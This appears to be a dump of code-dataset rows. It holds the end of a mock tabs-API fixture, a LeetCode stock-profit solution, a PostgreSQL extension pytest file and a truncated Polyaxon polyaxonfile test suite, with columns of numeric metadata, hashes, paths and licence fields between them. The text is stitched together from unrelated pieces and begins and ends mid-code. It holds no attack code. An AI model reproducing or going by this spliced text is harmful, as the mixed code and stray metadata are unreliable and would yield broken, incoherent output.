}
},
'912': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
}
]
}
]
}])
}
},
'874': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
}
]
}
]
}])
}
},
'835': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
}
]
}
]
}])
}
},
'782': {
'api': {
'extension_api.json': "{}"
}
}
})
| 21.620197
| 72
| 0.236308
| 887
| 24,193
| 6.378805
| 0.10372
| 0.180629
| 0.104984
| 0.152704
| 0.931071
| 0.931071
| 0.931071
| 0.931071
| 0.931071
| 0.931071
| 0
| 0.010142
| 0.612822
| 24,193
| 1,118
| 73
| 21.639535
| 0.593893
| 0.006407
| 0
| 0.522952
| 0
| 0
| 0.22489
| 0.020929
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0027
| 0
| 0.0027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3190b59ccf1361f84ec778e005efd2baff74455e
| 175
|
py
|
Python
|
Dynamic Programming/P122 - bestTimeToBuyAndSellStock_II.py
|
HarshOza36/LeetCode_Problems
|
6d7035e0d681213ac602b9e0382dbfa87f8d4745
|
[
"MIT"
] | null | null | null |
Dynamic Programming/P122 - bestTimeToBuyAndSellStock_II.py
|
HarshOza36/LeetCode_Problems
|
6d7035e0d681213ac602b9e0382dbfa87f8d4745
|
[
"MIT"
] | null | null | null |
Dynamic Programming/P122 - bestTimeToBuyAndSellStock_II.py
|
HarshOza36/LeetCode_Problems
|
6d7035e0d681213ac602b9e0382dbfa87f8d4745
|
[
"MIT"
] | null | null | null |
class Solution:
def maxProfit(self, prices: List[int]) -> int:
return sum(prices[i] - prices[i-1] if prices[i] > prices[i-1] else 0 for i in range(1, len(prices)))
| 58.333333
| 108
| 0.64
| 31
| 175
| 3.612903
| 0.612903
| 0.25
| 0.232143
| 0.25
| 0.267857
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028369
| 0.194286
| 175
| 3
| 108
| 58.333333
| 0.765957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
31923fff5015d60143b25a72c85ec522f6e91f75
| 1,448
|
py
|
Python
|
src/postgresql/tests/test_postgresql.py
|
LevZaplatin/postgresql-wheel
|
c59d33a5497bd8ae1f76bc19af2e235b6de7c8e0
|
[
"Apache-2.0"
] | 55
|
2021-08-29T18:43:14.000Z
|
2022-03-16T20:56:54.000Z
|
src/postgresql/tests/test_postgresql.py
|
LevZaplatin/postgresql-wheel
|
c59d33a5497bd8ae1f76bc19af2e235b6de7c8e0
|
[
"Apache-2.0"
] | 3
|
2021-09-01T16:52:35.000Z
|
2021-12-29T19:49:27.000Z
|
src/postgresql/tests/test_postgresql.py
|
LevZaplatin/postgresql-wheel
|
c59d33a5497bd8ae1f76bc19af2e235b6de7c8e0
|
[
"Apache-2.0"
] | 5
|
2021-09-02T03:57:35.000Z
|
2022-03-16T20:56:57.000Z
|
import postgresql
from postgresql import tmp_postgres
def test_setup_teardown():
pgdata, conn = postgresql.setup()
postgresql.teardown(pgdata)
def test_fixture(tmp_postgres):
pgdata, con_str = tmp_postgres
postgresql.psql(f'-d "{con_str}" -c "select version()"')
def test_default_extension(tmp_postgres):
pgdata, con_str = tmp_postgres
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION hstore;"')
def test_uuid_ossp_extension(tmp_postgres):
pgdata, con_str = tmp_postgres
postgresql.psql(f'-d "{con_str}" -c \'CREATE EXTENSION "uuid-ossp";\'')
def test_xml2_extension(tmp_postgres):
pgdata, con_str = tmp_postgres
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION xml2;"')
def test_postgis_extension(tmp_postgres):
pgdata, con_str = tmp_postgres
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION postgis;"')
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION postgis_raster;"')
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION postgis_topology;"')
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION postgis_sfcgal;"')
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION fuzzystrmatch;"')
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION address_standardizer;"')
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION address_standardizer_data_us;"')
postgresql.psql(f'-d "{con_str}" -c "CREATE EXTENSION postgis_tiger_geocoder;"')
| 36.2
| 90
| 0.71547
| 202
| 1,448
| 4.886139
| 0.188119
| 0.103343
| 0.182371
| 0.194529
| 0.729483
| 0.729483
| 0.729483
| 0.729483
| 0.729483
| 0.690983
| 0
| 0.001605
| 0.139503
| 1,448
| 39
| 91
| 37.128205
| 0.79053
| 0
| 0
| 0.185185
| 0
| 0
| 0.406077
| 0.052486
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.074074
| 0
| 0.296296
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
31b7d97a44386739d6c4ce39aaa3df436c860a27
| 38,152
|
py
|
Python
|
tests/test_polyaxonfile/test_polyaxonfile.py
|
gzcf/polyaxon-schemas
|
a381280cd7535f64158d52f0a9eff2afec997d90
|
[
"MIT"
] | null | null | null |
tests/test_polyaxonfile/test_polyaxonfile.py
|
gzcf/polyaxon-schemas
|
a381280cd7535f64158d52f0a9eff2afec997d90
|
[
"MIT"
] | null | null | null |
tests/test_polyaxonfile/test_polyaxonfile.py
|
gzcf/polyaxon-schemas
|
a381280cd7535f64158d52f0a9eff2afec997d90
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import os
from unittest import TestCase
from polyaxon_schemas.bridges import NoOpBridgeConfig
from polyaxon_schemas.environments import (
EnvironmentConfig,
K8SResourcesConfig,
PodResourcesConfig,
RunConfig,
SessionConfig
)
from polyaxon_schemas.exceptions import PolyaxonfileError
from polyaxon_schemas.graph import GraphConfig
from polyaxon_schemas.logging import LoggingConfig
from polyaxon_schemas.losses import AbsoluteDifferenceConfig, MeanSquaredErrorConfig
from polyaxon_schemas.matrix import MatrixConfig
from polyaxon_schemas.models import ClassifierConfig, GeneratorConfig, RegressorConfig
from polyaxon_schemas.optimizers import AdamConfig
from polyaxon_schemas.polyaxonfile.polyaxonfile import PolyaxonFile
from polyaxon_schemas.polyaxonfile.specification.frameworks import (
HorovodSpecification,
MXNetSpecification,
PytorchSpecification,
TensorflowSpecification
)
from polyaxon_schemas.processing.pipelines import TFRecordImagePipelineConfig
from polyaxon_schemas.run_exec import RunExecConfig
from polyaxon_schemas.settings import EarlyStoppingMetricConfig, SettingsConfig
from polyaxon_schemas.utils import Frameworks, SearchAlgorithms, TaskType
class TestPolyaxonfile(TestCase):
def test_missing_version_raises(self):
with self.assertRaises(PolyaxonfileError):
PolyaxonFile(os.path.abspath('tests/fixtures/missing_version.yml'))
def test_wrong_project_name_raises(self):
with self.assertRaises(PolyaxonfileError):
PolyaxonFile(os.path.abspath('tests/fixtures/wrong_project_name.yml'))
def test_missing_project_raises(self):
with self.assertRaises(PolyaxonfileError):
PolyaxonFile(os.path.abspath('tests/fixtures/missing_project.yml'))
def test_missing_kind_raises(self):
with self.assertRaises(PolyaxonfileError):
PolyaxonFile(os.path.abspath('tests/fixtures/missing_kind.yml'))
def test_simple_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/simple_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert spec.settings is None
assert spec.environment is None
assert spec.framework is None
assert spec.is_runnable
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
assert isinstance(spec.model, RegressorConfig)
assert isinstance(spec.model.loss, MeanSquaredErrorConfig)
assert isinstance(spec.model.optimizer, AdamConfig)
assert isinstance(spec.model.graph, GraphConfig)
assert len(spec.model.graph.layers) == 4
assert spec.model.graph.input_layers == [['images', 0, 0]]
last_layer = spec.model.graph.layers[-1].name
assert spec.model.graph.output_layers == [[last_layer, 0, 0]]
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
assert spec.eval is None
def test_simple_generator_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/simple_generator_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert spec.settings is None
assert spec.environment is None
assert spec.framework is None
assert spec.is_runnable
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
assert isinstance(spec.model, GeneratorConfig)
assert isinstance(spec.model.loss, MeanSquaredErrorConfig)
assert isinstance(spec.model.optimizer, AdamConfig)
assert isinstance(spec.model.encoder, GraphConfig)
assert isinstance(spec.model.decoder, GraphConfig)
assert isinstance(spec.model.bridge, NoOpBridgeConfig)
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
assert spec.eval is None
def test_advanced_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/advanced_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings, SettingsConfig)
assert isinstance(spec.settings.logging, LoggingConfig)
assert spec.settings.matrix is None
assert spec.is_runnable
assert isinstance(spec.environment, EnvironmentConfig)
assert spec.framework == Frameworks.TENSORFLOW
assert spec.environment.tensorflow.n_workers == 5
assert spec.environment.tensorflow.n_ps == 10
assert spec.environment.tensorflow.delay_workers_by_global_step is True
assert isinstance(spec.environment.tensorflow.run_config, RunConfig)
assert spec.environment.tensorflow.run_config.tf_random_seed == 100
assert spec.environment.tensorflow.run_config.save_summary_steps == 100
assert spec.environment.tensorflow.run_config.save_checkpoints_secs == 60
assert isinstance(spec.environment.tensorflow.run_config.session, SessionConfig)
assert spec.environment.tensorflow.run_config.session.allow_soft_placement is True
assert spec.environment.tensorflow.run_config.session.intra_op_parallelism_threads == 2
assert spec.environment.tensorflow.run_config.session.inter_op_parallelism_threads == 2
# check properties for returning worker configs and resources
assert spec.environment.tensorflow.worker_configs is None
assert spec.environment.tensorflow.ps_configs is None
assert spec.environment.tensorflow.worker_resources is None
assert spec.environment.tensorflow.ps_resources is None
cluster, is_distributed = spec.cluster_def
assert TensorflowSpecification.get_worker_configs(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
) == {}
assert TensorflowSpecification.get_ps_configs(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
) == {}
assert TensorflowSpecification.get_worker_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
) == {}
assert TensorflowSpecification.get_ps_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
) == {}
assert spec.cluster_def == ({TaskType.MASTER: 1,
TaskType.WORKER: 5,
TaskType.PS: 10}, True)
assert isinstance(spec.model, ClassifierConfig)
assert isinstance(spec.model.loss, MeanSquaredErrorConfig)
assert isinstance(spec.model.optimizer, AdamConfig)
assert spec.model.optimizer.learning_rate == 0.21
assert isinstance(spec.model.graph, GraphConfig)
assert len(spec.model.graph.layers) == 7
assert spec.model.graph.input_layers == [['images', 0, 0]]
assert len(spec.model.graph.output_layers) == 3
assert ['super_dense', 0, 0] in spec.model.graph.output_layers
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
assert len(spec.train.data_pipeline.feature_processors.feature_processors) == 1
assert isinstance(spec.eval.data_pipeline, TFRecordImagePipelineConfig)
assert spec.eval.data_pipeline.feature_processors is None
def test_advanced_file_with_custom_configs_and_resources_passes(self):
plxfile = PolyaxonFile(os.path.abspath(
'tests/fixtures/advanced_file_with_custom_configs_and_resources.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings, SettingsConfig)
assert isinstance(spec.settings.logging, LoggingConfig)
assert spec.settings.matrix is None
assert isinstance(spec.environment, EnvironmentConfig)
assert spec.is_runnable
assert spec.framework == Frameworks.TENSORFLOW
assert spec.environment.tensorflow.n_workers == 5
assert spec.environment.tensorflow.n_ps == 10
assert spec.environment.tensorflow.delay_workers_by_global_step is True
assert isinstance(spec.environment.tensorflow.run_config, RunConfig)
assert spec.environment.tensorflow.run_config.tf_random_seed == 100
assert spec.environment.tensorflow.run_config.save_summary_steps == 100
assert spec.environment.tensorflow.run_config.save_checkpoints_secs == 60
assert isinstance(spec.environment.resources, PodResourcesConfig)
assert isinstance(spec.environment.resources.cpu, K8SResourcesConfig)
assert spec.environment.resources.cpu.requests == 1
assert spec.environment.resources.cpu.limits == 2
assert isinstance(spec.environment.tensorflow.run_config.session, SessionConfig)
assert spec.environment.tensorflow.run_config.session.allow_soft_placement is True
assert spec.environment.tensorflow.run_config.session.intra_op_parallelism_threads == 2
assert spec.environment.tensorflow.run_config.session.inter_op_parallelism_threads == 2
assert isinstance(spec.environment.tensorflow.default_worker_config, SessionConfig)
assert spec.environment.tensorflow.default_worker_config.allow_soft_placement is True
assert spec.environment.tensorflow.default_worker_config.intra_op_parallelism_threads == 1
assert spec.environment.tensorflow.default_worker_config.inter_op_parallelism_threads == 1
assert isinstance(spec.environment.tensorflow.worker_configs[0], SessionConfig)
assert spec.environment.tensorflow.worker_configs[0].index == 3
assert spec.environment.tensorflow.worker_configs[0].allow_soft_placement is False
assert spec.environment.tensorflow.worker_configs[0].intra_op_parallelism_threads == 5
assert spec.environment.tensorflow.worker_configs[0].inter_op_parallelism_threads == 5
assert spec.environment.tensorflow.ps_configs is None
assert spec.environment.tensorflow.worker_resources is None
assert isinstance(spec.environment.tensorflow.default_ps_resources, PodResourcesConfig)
assert isinstance(spec.environment.tensorflow.default_ps_resources.cpu, K8SResourcesConfig)
assert spec.environment.tensorflow.default_ps_resources.cpu.requests == 2
assert spec.environment.tensorflow.default_ps_resources.cpu.limits == 4
assert isinstance(spec.environment.tensorflow.ps_resources[0], PodResourcesConfig)
assert isinstance(spec.environment.tensorflow.ps_resources[0].memory, K8SResourcesConfig)
assert spec.environment.tensorflow.ps_resources[0].index == 9
assert spec.environment.tensorflow.ps_resources[0].memory.requests == 512
assert spec.environment.tensorflow.ps_resources[0].memory.limits == 1024
# check that properties for return list of configs and resources is working
cluster, is_distributed = spec.cluster_def
worker_configs = TensorflowSpecification.get_worker_configs(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(worker_configs) == spec.environment.tensorflow.n_workers
assert set(worker_configs.values()) == {
spec.environment.tensorflow.default_worker_config,
spec.environment.tensorflow.worker_configs[0]}
assert TensorflowSpecification.get_ps_configs(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
) == {}
assert TensorflowSpecification.get_worker_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
) == {}
ps_resources = TensorflowSpecification.get_ps_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(ps_resources) == spec.environment.tensorflow.n_ps
assert set(ps_resources.values()) == {
spec.environment.tensorflow.default_ps_resources,
spec.environment.tensorflow.ps_resources[0]}
# Check total resources
assert spec.total_resources == {
'cpu': {'requests': 1 + 2 * 9, 'limits': 2 + 4 * 9},
'memory': {'requests': 512, 'limits': 1024},
'gpu': None
}
assert spec.cluster_def == ({TaskType.MASTER: 1,
TaskType.WORKER: 5,
TaskType.PS: 10}, True)
assert isinstance(spec.model, ClassifierConfig)
assert isinstance(spec.model.loss, MeanSquaredErrorConfig)
assert isinstance(spec.model.optimizer, AdamConfig)
assert spec.model.optimizer.learning_rate == 0.21
assert isinstance(spec.model.graph, GraphConfig)
assert len(spec.model.graph.layers) == 7
assert spec.model.graph.input_layers == [['images', 0, 0]]
assert len(spec.model.graph.output_layers) == 3
assert ['super_dense', 0, 0] in spec.model.graph.output_layers
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
assert len(spec.train.data_pipeline.feature_processors.feature_processors) == 1
assert isinstance(spec.eval.data_pipeline, TFRecordImagePipelineConfig)
assert spec.eval.data_pipeline.feature_processors is None
def test_matrix_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/matrix_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings.matrix['lr'], MatrixConfig)
assert isinstance(spec.settings.matrix['loss'], MatrixConfig)
assert spec.settings.matrix['lr'].to_dict() == {
'logspace': {'start': 0.01, 'stop': 0.1, 'num': 5}}
assert spec.settings.matrix['loss'].to_dict() == {'values': ['MeanSquaredError',
'AbsoluteDifference']}
assert spec.matrix_space == 10
assert isinstance(spec.settings, SettingsConfig)
assert spec.settings.concurrent_experiments == 2
assert spec.search_algorithm == SearchAlgorithms.GRID
assert spec.settings.early_stopping is None
assert spec.early_stopping == []
# assert spec.experiments_def == (
# 10,
# None,
# 2,
# SearchAlgorithms.GRID
# )
spec = spec.get_experiment_spec(matrix_declaration=spec.matrix_declaration_test)
assert spec.is_runnable
assert spec.environment is None
assert spec.framework is None
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
model = spec.model
assert isinstance(model, RegressorConfig)
assert isinstance(model.loss, (MeanSquaredErrorConfig, AbsoluteDifferenceConfig))
assert isinstance(model.optimizer, AdamConfig)
assert isinstance(model.graph, GraphConfig)
assert len(model.graph.layers) == 4
assert model.graph.input_layers == [['images', 0, 0]]
last_layer = model.graph.layers[-1].name
assert model.graph.output_layers == [[last_layer, 0, 0]]
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
def test_matrix_early_stopping_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/matrix_file_early_stopping.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings.matrix['lr'], MatrixConfig)
assert isinstance(spec.settings.matrix['loss'], MatrixConfig)
assert spec.settings.matrix['lr'].to_dict() == {
'logspace': {'start': 0.01, 'stop': 0.1, 'num': 5}}
assert spec.settings.matrix['loss'].to_dict() == {'values': ['MeanSquaredError',
'AbsoluteDifference']}
assert spec.matrix_space == 10
assert isinstance(spec.settings, SettingsConfig)
assert spec.settings.concurrent_experiments == 2
assert spec.settings.random_search.n_experiments == 5
assert spec.early_stopping == spec.settings.early_stopping
assert len(spec.settings.early_stopping) == 1
assert isinstance(spec.settings.early_stopping[0], EarlyStoppingMetricConfig)
# assert spec.experiments_def == (
# 10,
# 5,
# 2,
# SearchAlgorithms.RANDOM
# )
spec = spec.get_experiment_spec(matrix_declaration=spec.matrix_declaration_test)
assert spec.is_runnable
assert spec.environment is None
assert spec.framework is None
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
model = spec.model
assert isinstance(model, RegressorConfig)
assert isinstance(model.loss, (MeanSquaredErrorConfig, AbsoluteDifferenceConfig))
assert isinstance(model.optimizer, AdamConfig)
assert isinstance(model.graph, GraphConfig)
assert len(model.graph.layers) == 4
assert model.graph.input_layers == [['images', 0, 0]]
last_layer = model.graph.layers[-1].name
assert model.graph.output_layers == [[last_layer, 0, 0]]
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
def test_matrix_large_n_experiments_ignored_file_passes(self):
plxfile = PolyaxonFile(
os.path.abspath('tests/fixtures/matrix_file_ignored_n_experiments.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings.matrix['lr'], MatrixConfig)
assert isinstance(spec.settings.matrix['loss'], MatrixConfig)
assert spec.settings.matrix['lr'].to_dict() == {
'logspace': {'start': 0.01, 'stop': 0.1, 'num': 5}}
assert spec.settings.matrix['loss'].to_dict() == {'values': ['MeanSquaredError',
'AbsoluteDifference']}
assert spec.matrix_space == 10
assert isinstance(spec.settings, SettingsConfig)
assert spec.settings.concurrent_experiments == 2
assert spec.search_algorithm == SearchAlgorithms.RANDOM
assert spec.settings.random_search.n_experiments == 300
assert spec.early_stopping == []
# assert plxfile.experiments_def == (
# 10,
# None,
# 2,
# SearchAlgorithms.GRID
# )
spec = spec.get_experiment_spec(matrix_declaration=spec.matrix_declaration_test)
assert spec.is_runnable
assert spec.environment is None
assert spec.framework is None
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
model = spec.model
assert isinstance(model, RegressorConfig)
assert isinstance(model.loss, (MeanSquaredErrorConfig, AbsoluteDifferenceConfig))
assert isinstance(model.optimizer, AdamConfig)
assert isinstance(model.graph, GraphConfig)
assert len(model.graph.layers) == 4
assert model.graph.input_layers == [['images', 0, 0]]
last_layer = model.graph.layers[-1].name
assert model.graph.output_layers == [[last_layer, 0, 0]]
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
def test_one_matrix_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/one_matrix_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert spec.settings is not None
assert isinstance(spec.settings.matrix['loss'], MatrixConfig)
assert spec.settings.matrix['loss'].to_dict() == {'values': ['MeanSquaredError',
'AbsoluteDifference']}
assert spec.matrix_space == 2
spec = spec.get_experiment_spec(matrix_declaration=spec.matrix_declaration_test)
assert spec.is_runnable
assert spec.environment is None
assert spec.framework is None
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
model = spec.model
assert isinstance(model, RegressorConfig)
assert isinstance(model.loss, (MeanSquaredErrorConfig, AbsoluteDifferenceConfig))
assert isinstance(model.optimizer, AdamConfig)
assert isinstance(model.graph, GraphConfig)
assert len(model.graph.layers) == 4
assert model.graph.input_layers == [['images', 0, 0]]
last_layer = model.graph.layers[-1].name
assert model.graph.output_layers == [[last_layer, 0, 0]]
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
def test_run_simple_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/run_exec_simple_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'video_prediction'
assert spec.settings is None
assert spec.is_runnable
assert spec.environment is None
assert spec.framework is None
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
assert spec.model is None
run_exec = spec.run_exec
assert isinstance(run_exec, RunExecConfig)
assert run_exec.cmd == "video_prediction_train --model=DNA --num_masks=1"
def test_run_matrix_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/run_exec_matrix_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'video_prediction'
assert isinstance(spec.settings.matrix['model'], MatrixConfig)
assert spec.settings.matrix['model'].to_dict() == {'values': ['CDNA', 'DNA', 'STP']}
assert spec.matrix_space == 3
assert isinstance(spec.settings, SettingsConfig)
declarations = spec.matrix_declaration_test
spec = spec.get_experiment_spec(declarations)
assert spec.is_runnable
assert spec.environment is None
assert spec.settings is not None
assert spec.settings.logging is not None
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
assert spec.model is None
run_exec = spec.run_exec
assert isinstance(run_exec, RunExecConfig)
declarations['num_masks'] = 1 if declarations['model'] == 'DNA' else 10
assert run_exec.cmd == ('video_prediction_train '
'--model="{model}" '
'--num_masks={num_masks}').format(
**declarations
)
def test_distributed_tensorflow_passes(self):
plxfile = PolyaxonFile(os.path.abspath(
'tests/fixtures/distributed_tensorflow_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings, SettingsConfig)
assert isinstance(spec.settings.logging, LoggingConfig)
assert spec.settings.matrix is None
assert isinstance(spec.environment, EnvironmentConfig)
assert spec.is_runnable
assert spec.framework == Frameworks.TENSORFLOW
assert spec.environment.tensorflow.n_workers == 5
assert spec.environment.tensorflow.n_ps == 10
assert isinstance(spec.environment.resources, PodResourcesConfig)
assert isinstance(spec.environment.resources.cpu, K8SResourcesConfig)
assert spec.environment.resources.cpu.requests == 1
assert spec.environment.resources.cpu.limits == 2
assert isinstance(spec.environment.tensorflow.default_worker_resources,
PodResourcesConfig)
assert isinstance(spec.environment.tensorflow.default_worker_resources.cpu,
K8SResourcesConfig)
assert spec.environment.tensorflow.default_worker_resources.cpu.requests == 3
assert spec.environment.tensorflow.default_worker_resources.cpu.limits == 3
assert isinstance(spec.environment.tensorflow.default_worker_resources.memory,
K8SResourcesConfig)
assert spec.environment.tensorflow.default_worker_resources.memory.requests == 256
assert spec.environment.tensorflow.default_worker_resources.memory.limits == 256
assert isinstance(spec.environment.tensorflow.worker_resources[0], PodResourcesConfig)
assert isinstance(spec.environment.tensorflow.worker_resources[0].memory,
K8SResourcesConfig)
assert spec.environment.tensorflow.worker_resources[0].index == 3
assert spec.environment.tensorflow.worker_resources[0].memory.requests == 300
assert spec.environment.tensorflow.worker_resources[0].memory.limits == 300
assert isinstance(spec.environment.tensorflow.default_ps_resources, PodResourcesConfig)
assert isinstance(spec.environment.tensorflow.default_ps_resources.cpu, K8SResourcesConfig)
assert spec.environment.tensorflow.default_ps_resources.cpu.requests == 2
assert spec.environment.tensorflow.default_ps_resources.cpu.limits == 4
assert isinstance(spec.environment.tensorflow.ps_resources[0], PodResourcesConfig)
assert isinstance(spec.environment.tensorflow.ps_resources[0].memory, K8SResourcesConfig)
assert spec.environment.tensorflow.ps_resources[0].index == 9
assert spec.environment.tensorflow.ps_resources[0].memory.requests == 512
assert spec.environment.tensorflow.ps_resources[0].memory.limits == 1024
# check that properties for return list of configs and resources is working
cluster, is_distributed = spec.cluster_def
worker_resources = TensorflowSpecification.get_worker_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(worker_resources) == spec.environment.tensorflow.n_workers
assert set(worker_resources.values()) == {
spec.environment.tensorflow.default_worker_resources,
spec.environment.tensorflow.worker_resources[0]}
ps_resources = TensorflowSpecification.get_ps_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(ps_resources) == spec.environment.tensorflow.n_ps
assert set(ps_resources.values()) == {
spec.environment.tensorflow.default_ps_resources,
spec.environment.tensorflow.ps_resources[0]}
# Check total resources
assert spec.total_resources == {
'cpu': {'requests': 1 + 3 * 4 + 2 * 9, 'limits': 2 + 3 * 4 + 4 * 9},
'memory': {'requests': 300 + 256 * 4 + 512, 'limits': 300 + 256 * 4 + 1024},
'gpu': None
}
assert spec.cluster_def == ({TaskType.MASTER: 1,
TaskType.WORKER: 5,
TaskType.PS: 10}, True)
def test_distributed_horovod_passes(self):
plxfile = PolyaxonFile(os.path.abspath(
'tests/fixtures/distributed_horovod_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings, SettingsConfig)
assert isinstance(spec.settings.logging, LoggingConfig)
assert spec.settings.matrix is None
assert isinstance(spec.environment, EnvironmentConfig)
assert spec.is_runnable
assert spec.framework == Frameworks.HOROVOD
assert spec.environment.horovod.n_workers == 5
assert isinstance(spec.environment.resources, PodResourcesConfig)
assert isinstance(spec.environment.resources.cpu, K8SResourcesConfig)
assert spec.environment.resources.cpu.requests == 1
assert spec.environment.resources.cpu.limits == 2
assert isinstance(spec.environment.horovod.default_worker_resources,
PodResourcesConfig)
assert isinstance(spec.environment.horovod.default_worker_resources.cpu,
K8SResourcesConfig)
assert spec.environment.horovod.default_worker_resources.cpu.requests == 3
assert spec.environment.horovod.default_worker_resources.cpu.limits == 3
assert isinstance(spec.environment.horovod.default_worker_resources.memory,
K8SResourcesConfig)
assert spec.environment.horovod.default_worker_resources.memory.requests == 256
assert spec.environment.horovod.default_worker_resources.memory.limits == 256
assert isinstance(spec.environment.horovod.worker_resources[0], PodResourcesConfig)
assert isinstance(spec.environment.horovod.worker_resources[0].memory,
K8SResourcesConfig)
assert spec.environment.horovod.worker_resources[0].index == 3
assert spec.environment.horovod.worker_resources[0].memory.requests == 300
assert spec.environment.horovod.worker_resources[0].memory.limits == 300
# check that properties for return list of configs and resources is working
cluster, is_distributed = spec.cluster_def
